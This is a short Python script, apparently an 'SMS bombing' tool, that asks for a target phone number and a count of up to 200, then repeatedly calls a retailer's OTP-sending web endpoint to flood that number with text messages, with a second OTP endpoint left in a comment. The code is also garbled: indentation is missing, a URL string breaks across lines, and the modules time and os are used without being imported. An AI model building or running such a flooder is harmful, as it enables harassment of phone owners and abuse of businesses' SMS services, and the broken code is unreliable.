import requests
#GET M
#https://www.bioscopelive.com/en/login/send-otp?phone=88"+number+"&operator=bd-otp
number=str(input("\033[1;32;40mEnter Your Number : "))
api="https://www.shwapno.com/WebAPI/CRMActivation/Validate?Channel=W&otpCRMrequi
red=false&otpeCOMrequired=true&smssndcnt=8&otpBasedLogin=false&LoyaltyProvider=&
MobileNO="+number+"&countryPhoneCode=%2B88&Format=html"
amount=int(input("\033[1;34;40mEnter Your Amount : "))
logo3= '''
\033[1;30;40mSmS Bombing Stat
Stop It Press CTRL + Z
'''
if amount <=200:
print(logo3)
else:
print("\033[31mLimit Only 200 ")
time.sleep(1)
os.system('python Mmm.py')
for i in range(amount):
requests.get(api)
print(str(i+1))
os.system('python Mmm.py')
